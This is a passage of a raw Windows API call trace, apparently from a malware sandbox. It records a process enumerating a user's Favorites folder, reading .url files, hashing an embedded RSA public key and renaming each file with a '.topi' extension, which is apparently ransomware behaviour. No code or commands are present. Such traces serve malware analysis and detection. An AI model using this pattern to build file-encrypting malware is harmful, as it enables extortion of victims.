(HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0096.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.434] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02828 | out: hHeap=0x680000) returned 1 [0096.434] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.434] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.434] PathFindFileNameW (pszPath="") returned="" [0096.434] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0096.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.435] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.435] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0096.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.435] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.435] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.435] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0096.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.435] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.435] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.438] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.438] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.439] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.439] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.439] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.440] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.440] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.440] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.440] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.440] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.441] GetLastError () returned 0x0 [0096.441] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.441] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.441] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.441] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.441] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.441] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.442] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.topi")) returned 1 [0096.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.443] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.444] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0096.444] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0096.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.445] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.445] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.448] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.448] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.449] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.450] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.450] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.450] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.450] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.450] GetLastError () returned 0x0 [0096.450] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.450] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.450] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.450] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.450] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.450] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.450] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.450] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.450] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02870 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a028b8 [0096.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.451] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98d0 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x6d4bd0 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.452] GetCurrentThreadId () returned 0x8c4 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7e30 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.452] GetCurrentThreadId () returned 0x8c4 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03468 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03480 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03498 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03480 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03480 [0096.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03468 | out: hHeap=0x680000) returned 1 [0096.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03480 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: 